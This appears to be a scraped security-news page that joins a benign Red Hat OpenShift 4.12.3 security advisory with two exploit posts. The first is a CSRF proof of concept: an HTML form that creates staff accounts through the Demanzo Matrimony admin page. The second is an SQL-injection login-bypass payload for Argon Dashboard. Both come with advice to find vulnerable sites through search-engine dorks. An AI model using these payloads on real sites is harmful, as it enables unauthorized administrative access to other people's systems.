This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.3. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:0727

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

Security Fix(es):

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:382f271581b9b907484d552bd145e9a5678e9366330059d31b007f4445d99e36

      (For s390x architecture)  
The image digest is  
sha256:529e7aa3a821892575abeecd4971dff194f48943ce364a01d93c599c27d2ef9c

      (For ppc64le architecture)  
The image digest is  
sha256:8db6cb445bdf1534860a1a47f8c50bc73d99dfdd196f06184acbcea5d7bc112f

      (For aarch64 architecture)  
The image digest is  
sha256:4657924fc2720f48932dec10380428804e9d82194f8ac748b7329f7c18021ef8

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-213 - base image quay.io/operator-framework/ansible-operator. After moving to tag v1.20.0, it breaks the task to update k8s_status in an FIPS enabled cluster   
OCPBUGS-2210 - ZTP with converged flow is too slow  
OCPBUGS-298 - Make ovnkube-trace work on hypershift deployments  
OCPBUGS-3095 - IPI for Power VS: Deploy fails when there is are certain preexisting resources  
OCPBUGS-3399 - ovn-k behaviour for service CIDR that doesn't match existing svc ip+port  
OCPBUGS-3941 - Whereabouts CNI timesout while iterating exclude range [backport 4.12]  
OCPBUGS-4238 - Hosted ovnkubernetes pods are not being spread among workers evenly  
OCPBUGS-4281 - Metrics are not available when running console in development mode  
OCPBUGS-4862 - Deletion of BYOH Windows node hangs in Ready,SchedulingDisabled  
OCPBUGS-5093 - After entering valid git repo url on Import from git page, throwing warning message instead Validated  
OCPBUGS-5841 - [4.12] Modifying node_mgmt_port_netdev_flags on OVN-K node will crash  
OCPBUGS-5960 - [4.12] Bootimage bump tracker  
OCPBUGS-5996 - [vsphere] installation errors out when missing topology in a failure domain  
OCPBUGS-6066 - Released operator versions are disappearing  
OCPBUGS-6076 - AMQ reconnect for 7 minutes  floods linuxptp daemon with socket connection error  
OCPBUGS-6085 - Editing Pipeline in the ocp console to get information error  
OCPBUGS-6494 - One old machine stuck in Deleting and many co get degraded when doing master replacement on the cluster with OVN network  
OCPBUGS-6669 - Do not show UpdateInProgress when status is Failing  
OCPBUGS-6703 - oc-mirror heads-only does not work with target name  
OCPBUGS-6758 - `create a project` link not backed by RBAC check  
OCPBUGS-6764 - Add Git Repository form shows empty permission content and non-working help link until a git url is entered  
OCPBUGS-6766 - "Delete dependent objects of this resource" might cause confusions  
OCPBUGS-6805 - MCO reconcile fails if user replace the pull secret to empty one  
OCPBUGS-6823 - [release-4.12] Egress FW ACL rules are invalid in dualstack mode  
OCPBUGS-6850 - admin ack test nondeterministically does a check post-upgrade  
OCPBUGS-6913 - PipelineRun task status overlaps status text  
OCPBUGS-6928 - Update OWNERS_ALIASES in release-4.12 branch  
OCPBUGS-6969 - User Preferences - Applications : Resource type drop-down i18n misses  
OCPBUGS-6997 - Update 4.12 ose-machine-config-operator image to be consistent with ART  
OCPBUGS-7025 - Bundle Unpacker Using "Always" ImagePullPolicy for digests  
OCPBUGS-7103 - Agent ISO does not respect proxy settings

6. References:

https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY+7KQtzjgjWX9erEAQiMxRAAhNd1a5zjOKI7HsdHjAAnON9zEuxOn1tn  
VW+fAYkyUgQRIrTrXyabzAgf4mJmy6YeKxYJiWCDmQGAkfTZb9QvfHm8rJQCJ4Zk  
lI6aVAlkouPHk5HAY10yV1rPmRPeWviycfljtPZ+fXrR7KDY61JWEt/VFN8F/zt8  
cJ1uM7NmOUndLDfttHlEj2a35a6iBJxAtTJ9e2/s+3HqTNiiQzT9ghkeyJnUUglB  
g5aHttjkL6blxnIjeeSytUCmRS0CpqMAUdyfQft2zLM0vN58JPChy/t14acEaKQ/  
+MqVRtjPI6NtmLWu6WCwuhMqU0BLFVKp8nk7Ue1tvnyC/egBpD9mjM9sxD5SrRg1  
wFMXgQ17tioPdValyakjxc3+I9GdNu6mKD7AaqKIlZxmFZoR5kCH3pykuw2Pcx9i  
/4b2iLc4USyMJSAssuoLhljS/3jli5VZRLSm2LEOCchAjo1nES1nUh6d2ePcH9YP  
s/E+x4Li3EML+tAxiqgr4KeI5fwg7nDdP5hvltFgVdD1y+D2JrCz+7vhmSnSPej+  
AbwM5n+T5IkiQRGwnFf5KUqSpGPd3IvVLinCKPWEkYRezGhbUzAhc3V5PvtR0Tl2  
Tao8dMVBvvttlLf5jcvJaiw3VBdOcOIHx5JJSUiZ6HomMGBYva8Gfj4F57WnnEK2  
PbL5ln8DF7w=  
=LpVM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0728-01

Demanzo Matrimony version 1.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Demanzo Matrimony v.1.5 CSRF Vulnerability                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit)                                            |   
| # Vendor    : https://demanzo.com/matrimony-site-development/                                                                    |    
| # Dork      : Powered by ITAcumens or "Powered by Demanzo"                                                                       |  
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply . 

</div>  
                       <form action="https://www.example/web/html/admin/add-staff.php" method="POST">  
            <div id="msg">  
                          <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Name <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="name" id="name" value="" type="text" class="form-control" placeholder="Enter Name">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Password <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="pass" id="pass" value="" type="password" class="form-control" placeholder="Enter Password">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Email ID <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">  
                                  <input required="" name="email" id="email" value="" type="email" class="form-control" placeholder="Enter Email ID">     
                                </div>  
                            </div>

                                                        <div class="form-group ban_btm1 col-md-6 no_pad">  
                              <label class="control-label col-md-4 frm_pd">Gender <span class="red">*</span> : </label>  
                                <div class="col-md-8 frm_pd">   
                                    <input type="radio" name="gender" value="Male" checked=""><label class="rd_btn">Male</label>  
                                    <input type="radio" name="gender" value="Female"><label class="rd_btn">Female</label>  
                            </div>  
                            </div>

                                                           <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label frm_pd col-md-2">Designation <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <input required="" name="designation" value="" id="designation" type="text" class="form-control" placeholder="Enter Designation">     
                                </div>  
                            </div>   

                                                        <div class="form-group ban_btm1 col-md-12 no_pad">  
                              <label class="control-label col-md-2 frm_pd">Address  <span class="red">*</span> : </label>  
                                <div class="col-md-10 frm_pd">  
                                  <textarea required="" name="address" id="address" rows="7" class="form-control" placeholder="Enter Address"></textarea>    
                                </div>  
                            </div> 

                                                          
                                
                                  
                                    
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                      
                                  
                            

                                                          
                                
                                  
                                       
                                       
                              
                            

                                                        <div class="form-group ban_btm1 col-lg-5 col-md-12 no_pad">  
                              <label class="control-label col-lg-4 col-md-2 frm_pd no_pad">Staff Status <span class="red">*</span> : </label>  
                                <div class="col-lg-8 col-md-10 frm_pd">   
                                    <input type="radio" name="status" value="0" checked=""><label class="rd_btn">Active</label>  
                                    <input type="radio" name="status" value="1"><label class="rd_btn">Inactive</label>  
                            </div>  
                            </div>

                                                        <div class="col-md-2 col-md-offset-5 col-sm-12">  
                                <input type="submit" class="ctn_btn no_mt1" value="Add" name="add">  
                            </div> 

 Greetings to :===================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|          
==================================================================================================

Demanzo Matrimony 1.5 Cross Site Request Forgery

Argon Dashboard version 1.1.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Argon Dashboard - v1.1.2 Auth By Pass Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)                                              | | # Vendor    : https://www.creative-tim.com/product/argon-dashboard#                                                              |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''='@gmail.com1 & Pass : 'or''='[+] https://127.0.0.1/aadarshinstrumentscom/admin/examples/inquiry.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Tag

#windows